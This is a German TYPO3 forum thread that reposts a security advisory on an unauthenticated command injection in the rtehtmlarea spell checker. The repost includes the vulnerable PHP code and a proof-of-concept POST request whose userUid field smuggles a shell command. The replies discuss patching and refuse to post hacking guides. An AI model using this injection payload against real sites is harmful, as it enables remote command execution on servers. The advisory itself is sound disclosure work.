Zum Inhalt springen

Typo3 Command Execution Vulnerability / htmlarea mit aspell

Erstellt am 20. Dezember 2006 · 11 Antworten · letzte Antwort am 18. Januar 2007

Tags: Frage

scuba303 ·

info kam grade von securiteam.org

Typo3 Command Execution Vulnerability
------------------------------------------------------------------------

SUMMARY

<http://www.typo3.com> TYPO3 is "a free Open Source content management system for enterprise purposes on the web and in intranets. It offers full flexibility and extendability while featuring an accomplished set of ready-made interfaces, functions and modules".

In version 4.0 and above, Typo3 includes a sysext named rtehtmlarea. The extension can optionally also be installed on Typo3 versions below 4.0.
The RTE HTML Editor allows spell checking, for which it uses the command line tool 'aspell'. When this program is called, unvalidated user input is used as argument to the system call. Login to the backend is /not/ required to exploit this vulnerability.

This allows an attacker to execute arbitrary commands on the target system.

DETAILS

Vulnerable Systems:
* Typo3 versions 4.0.0 - 4.0.3
* Typo3 versions 3.7 and 3.8 with rtehtmlarea extension
* Typo3 version 4.1beta

Immune Systems:
* Typo3 version 4.0.4

The affected script resides in
/typo3/sysext/rtehtmlarea/htmlarea/plugins/SpellChecker/spell-check-logic.php which calls the vulnerable script /typo3/sysext/rtehtmlarea/pi1/class.tx_rtehtmlarea_pi1.php. It requires a GET parameter id with the pageid of an existing page. When the POST parameter cmd is set to learn, the parameter userUid is not validated and can be used by an attacker to inject code.

Here is the vulnerable code (line 208-):
$AspellCommand = 'cat ' . $tmpFileName . ' | ' . $this->AspellDirectory .
' -a --mode=none' . $this->personalDictsArg . ' --lang=' .
$this->dictionary . ' --encoding=' . $this->parserCharset . ' 2>&1'; print $AspellCommand . "\n"; print shell_exec($AspellCommand);

There seems to be a second command execution vulnerability in the same file in line 365. It is left as a task to the reader to exploit that flaw.

For typo3 versions < 4.0, the rtehtmlarea extension is probably located at /typo3/ext.

Proof of concept:
Here is a sample POST request that writes a file 'shell.txt' into /tmp:

POST /typo3/sysext/rtehtmlarea/htmlarea/plugins/SpellChecker/spell-
check-logic.php?id=1 HTTP/1.1
Host: www.typo3host.abc
User-Agent: none
Content-Type: application/x-www-form-urlencoded
Content-Length: 111

psell_mode=fast&to_p_dict=1&cmd=learn&userUid=test;
echo+'shell'+>+/tmp/shell.txt %23&enablePersonalDicts=true

ADDITIONAL INFORMATION

The information has been provided by <mailto:research@sec-consult.com> SEC Consult Research.
The original article can be found at:
<http://www.sec-consult.com/272.html> http://www.sec-consult.com/272.html

jenses ·
steffenk schrieb

übrigens - mittwald.de hat (vorbildlich!) den patch auf allen Accounts eingespielt, wir dürfen uns gemütlich zurücklehnen 🙂

Davon würde ich DRINGENDST abraten 😉
Kontrolliert umgehend eure Accounts,
bei mir war trotz anders lautender Email weiterhin eine alte anfällige Version (1.3.7) als Sysex installiert, von einem Patch war nix zu sehen.

derhansen ·

Wenn ich mir den entsprechend verwundbaren Code so ansehe...

$AspellCommand = 'cat ' . $tmpFileName . ' | ' . $this->AspellDirectory

. ' -a --mode=none' . $this->personalDictsArg . ' --lang=' .

$this->dictionary . ' --encoding=' . $this->parserCharset . ' 2>&1';

print $AspellCommand . "\n";

print shell_exec($AspellCommand);

... würde ich sagen, wenn shell_exec() in der php.ini deaktivert ist, dann kann man die Lücke auch nicht benutzen um Code auszuführen.

Sehe ich das richtig?

skywalk ·

Hallo!

Wie kann ich den von extern, also von zuhause testen ob meine Installation überhaupt anfällig ist? Ob nun ein Update eingespielt ist oder nicht, gerne würde ich wissen wie ich das teste - und anschließend handeln.

Gruß

just2b ·
skywalk schrieb

Wie kann ich den von extern, also von zuhause testen ob meine Installation überhaupt anfällig ist? Ob nun ein Update eingespielt ist oder nicht, gerne würde ich wissen wie ich das teste - und anschließend handeln.

hier wird sicher keine Anleitung gepostet wie man eine TYPO3-Installation hackt!

georg

skywalk ·
just2b schrieb
skywalk schrieb

Wie kann ich den von extern, also von zuhause testen ob meine Installation überhaupt anfällig ist? Ob nun ein Update eingespielt ist oder nicht, gerne würde ich wissen wie ich das teste - und anschließend handeln.

hier wird sicher keine Anleitung gepostet wie man eine TYPO3-Installation hackt!

georg

Sorry, wenn ich hier einen falschen Eindruck hinterlassen habe. Ich wollte nur meine eigene Installation testen, mehr nicht. Ich werde dann wohl einfach die entsprechende Funktion abschalten, basta.

Danke!

just2b ·
skywalk schrieb

Sorry, wenn ich hier einen falschen Eindruck hinterlassen habe. Ich wollte nur meine eigene Installation testen, mehr nicht. Ich werde dann wohl einfach die entsprechende Funktion abschalten, basta.

ja wir kennen es nur alle... immer nur vom eigenen zip file das Passwort vergessen 😉

abschalten oder einfach updaten

lg georg

pulponair ·
just2b schrieb

hier wird sicher keine Anleitung gepostet wie man eine TYPO3-Installation hackt!

warum eigentlich nicht, das ding ist uralt und alle machen sich in die hosen, wegen sonner trivialen geschichte. Darf ich darf ich ?😉

just2b ·
pulponair schrieb
just2b schrieb

hier wird sicher keine Anleitung gepostet wie man eine TYPO3-Installation hackt!

warum eigentlich nicht, das ding ist uralt und alle machen sich in die hosen, wegen sonner trivialen geschichte. Darf ich darf ich ?😉

nö! es wird genug installationen geben, die nicht auf aktuellem stand sind 😉 hack doch localhost 😉

georg